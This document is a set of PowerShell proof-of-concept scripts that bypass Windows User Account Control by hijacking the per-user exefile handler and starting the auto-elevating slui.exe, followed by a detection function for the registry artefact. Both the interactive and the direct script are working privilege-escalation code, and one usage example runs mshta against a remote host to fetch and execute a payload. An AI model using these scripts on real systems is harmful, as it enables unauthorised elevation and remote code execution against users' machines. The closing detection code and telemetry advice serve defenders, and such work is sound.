Interactive Version:

```powershell
<#
.SYNOPSIS
    Proof of concept to bypass User Account Control (UAC) via SluiFileHandlerHijackLPE.

    slui.exe is a Windows binary that auto-elevates. The script writes a per-user
    "exefile" file handler under HKCU:\Software\Classes (HKCR is the merged view of
    HKLM\Software\Classes and HKCU\Software\Classes, and the HKCU entry wins for the
    current user), starts slui.exe with the runas verb so the hijacked handler is
    executed in the elevated context, then removes the registry key again.
.NOTES
    Function : SluiHijackBypass
    File Name: SluiHijackBypass.ps1
    Author   : Gushmazuko
.LINK
    https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
    Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
    Load "cmd.exe" (by default 'arch 64' is used):
    SluiHijackBypass -command "cmd.exe" -arch 64

    Load "mshta http://192.168.0.30:4444/0HUGN":
    SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
#>
function SluiHijackBypass() {
    Param (
        # Command string written as the exefile open handler; it runs verbatim
        # in the elevated context (no "%1" placeholder is substituted).
        [Parameter(Mandatory=$True)]
        [String]$command,
        # 64: native PowerShell; 86: 32-bit PowerShell on 64-bit Windows.
        [ValidateSet(64,86)]
        [int]$arch = 64
    )

    # Create registry structure: the per-user exefile handler shadows the
    # machine-wide one from HKLM for this user only.
    New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

    # Perform the bypass: slui.exe started with the runas verb auto-elevates,
    # and the hijacked handler is executed at that integrity level.
    switch ($arch) {
        64 {
            # x64 shell on Windows x64 | x86 shell on Windows x86
            Start-Process "C:\Windows\System32\slui.exe" -Verb runas
        }
        86 {
            # x86 shell on Windows x64: Sysnative is only visible to 32-bit
            # processes and resolves to the real 64-bit System32, so the native
            # cmd.exe launches the native slui.exe.
            C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
        }
    }

    # Remove registry structure. The 3-second sleep gives slui.exe time to read
    # the handler before it disappears; only the "shell" subtree is removed, so
    # the empty HKCU:\Software\Classes\exefile key itself is left behind.
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
}
```

Non-Interactive Version:

```powershell
<#
.SYNOPSIS
    Non-interactive version of the script, for direct execution.
    Proof of concept to bypass User Account Control (UAC) via SluiFileHandlerHijackLPE.
.NOTES
    File Name: SluiHijackBypass_direct.ps1
    Author   : Gushmazuko
.LINK
    https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
    Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
    Load "cmd.exe" (by default 'arch 64' is used):
    powershell -exec bypass .\SluiHijackBypass_direct.ps1
#>

# Command executed as the hijacked exefile handler (edit to taste).
$program = "cmd.exe"

# Create the per-user exefile handler that shadows the machine-wide one.
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force

# For x64 shell on Windows x64:
Start-Process "C:\Windows\System32\slui.exe" -Verb runas

# For x86 shell on Windows x64 (comment out the line above and use this instead):
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"

# Give slui.exe time to read the handler, then clean up the "shell" subtree.
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
```
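The scripts above rely on one registry artefact: a per-user `exefile\shell\<verb>\command` key under `Software\Classes`. The following added example (mine, not code from the WinBypass repository or from the bytecode77 writeup) is the defender-side check: it walks every loaded user hive under `HKEY_USERS` and lists any per-user exefile verb it finds, marking commands that differ from the stock handler. It assumes that a clean system has no `exefile` key under a user's `Software\Classes` at all, that the stock machine-wide handler resolves to `"%1" %*`, and that ordinary user hives use the `S-1-5-21-...` SID form; the function name `Get-ExefileHandlerOverride` is mine.

```powershell
function Get-ExefileHandlerOverride {
    <#
    .SYNOPSIS
        Lists per-user exefile shell verbs found under
        HKEY_USERS\<SID>\Software\Classes\exefile\shell\*\command.
        Such keys are normally absent; the machine-wide handler lives under
        HKLM\Software\Classes\exefile and resolves to "%1" %* (assumed stock value).
    #>
    [CmdletBinding()]
    param(
        # Stock exefile open command (assumption for this example).
        [string]$StockCommand = '"%1" %*'
    )

    $results = @()

    # Provider-qualified path, so no HKU: PSDrive needs to be mapped.
    # Only S-1-5-21-... hives are real user accounts; the *_Classes hives and
    # well-known service SIDs are skipped on purpose.
    $hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[0-9-]+$' }

    foreach ($hive in $hives) {
        $sid      = $hive.PSChildName
        $shellKey = "Registry::HKEY_USERS\$sid\Software\Classes\exefile\shell"
        if (-not (Test-Path -LiteralPath $shellKey)) { continue }

        foreach ($verb in Get-ChildItem -LiteralPath $shellKey -ErrorAction SilentlyContinue) {
            $commandKey = "$shellKey\$($verb.PSChildName)\command"
            if (-not (Test-Path -LiteralPath $commandKey)) { continue }

            # "(default)" is how the registry provider names the unnamed value.
            $command = (Get-ItemProperty -LiteralPath $commandKey -ErrorAction SilentlyContinue).'(default)'

            # The key existing at all is already an override of the HKLM handler;
            # a non-stock command is what the PoC above writes (e.g. cmd.exe, mshta ...).
            if ($command -eq $StockCommand) {
                $note = 'per-user override present, but command matches stock handler'
            } else {
                $note = 'per-user override with non-default command: investigate'
            }

            $results += [pscustomobject]@{
                UserSid = $sid
                Verb    = $verb.PSChildName
                Command = $command
                Key     = $commandKey
                Note    = $note
            }
        }
    }

    $results
}

# Usage: run from an elevated prompt so every loaded user hive is readable.
Get-ExefileHandlerOverride | Format-Table -AutoSize
```

Because the PoC deletes the key about three seconds after launching slui.exe, a point-in-time scan like this only catches it if the payload is still running or the cleanup failed; for after-the-fact detection, registry set-value telemetry on `\Software\Classes\exefile\shell\open\command` (Sysmon event 12/13, or equivalent EDR registry events) combined with a process-creation event for `slui.exe` whose child runs at high integrity is the more reliable signal.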